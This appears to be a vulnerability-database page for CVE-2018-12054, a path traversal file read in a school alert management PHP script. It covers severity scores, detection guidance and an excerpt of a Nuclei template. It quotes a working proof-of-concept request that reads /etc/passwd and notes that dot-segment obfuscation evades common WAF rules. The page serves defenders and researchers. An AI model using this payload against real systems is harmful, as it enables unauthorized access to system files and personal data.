CVE-2018-12054
published 2018-06-08CVE-2018-12054: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
PriorityP264high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
39.39%
98.4th percentile
Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
Detection & IOCsextracted from sources · hover to see the quote
yara↗
regex: root:.*:0:0:
- →The vulnerability is triggered via the `f` parameter in `img.php` using absolute path traversal with dot-segment obfuscation (e.g., /./etc/./passwd). Monitor GET requests to img.php with path traversal patterns in the `f` parameter. ↗
- →A successful exploitation response will contain the content of /etc/passwd, detectable by the regex pattern `root:.*:0:0:` in the HTTP response body with a 200 status code. ↗
- ·The traversal payload uses dot-segment obfuscation (/./etc/./passwd) rather than classic ../ sequences, meaning standard path traversal WAF rules may not catch this variant. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Schools Alert Management Script - Arbitrary File Read
exploitdb·2018-06-11·CVSS 7.5
CVE-2018-12054 [HIGH] Schools Alert Management Script - Arbitrary File Read
Schools Alert Management Script - Arbitrary File Read
---
# Exploit Title: Schools Alert Management Script - Arbitrary File Read
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/4
# Tested on: Linux Mint
# CVE: CVE-2018-12054
# Proof of Concept:
/img.php?f=/./etc/./passwd
Nuclei
Schools Alert Management Script - Arbitrary File Read
nuclei·CVSS 7.5
CVE-2018-12054 [HIGH] Schools Alert Management Script - Arbitrary File Read
Schools Alert Management Script - Arbitrary File Read
Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
Template:
id: CVE-2018-12054
info:
name: Schools Alert Management Script - Arbitrary File Read
author: wisnupramoedya
severity: high
description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.
impact: |
This vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.
remediation: |
Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerabili
No writeups or analysis indexed.
2018-06-08
Published